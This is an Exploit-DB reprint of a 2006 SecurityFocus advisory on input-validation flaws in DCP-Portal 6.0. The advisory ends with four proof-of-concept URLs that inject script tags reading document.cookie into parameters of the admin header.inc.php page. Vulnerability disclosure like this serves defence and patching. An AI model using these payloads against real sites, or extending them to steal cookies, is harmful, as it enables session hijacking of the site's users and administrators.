DCP-Portal 6.0 - '/admin/inc/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

28572




Platform:

PHP

Date:

2006-09-14


source: https://www.securityfocus.com/bid/20024/info
 
DCP-Portal is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting, SQL-injection, and remote file-include issues, because the application fails to sanitize user-supplied input. 
 
A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, exploit vulnerabilities in the underlying database implementation, or include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. Other attacks are also possible.
 
Version 6.0 Standard Edition is vulnerable to these issues; other versions may also be affected.

http://www.example.com/admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</script><"
http://www.example.com/admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</script>
http://www.example.com/admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</script>
http://www.example.com/admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</script>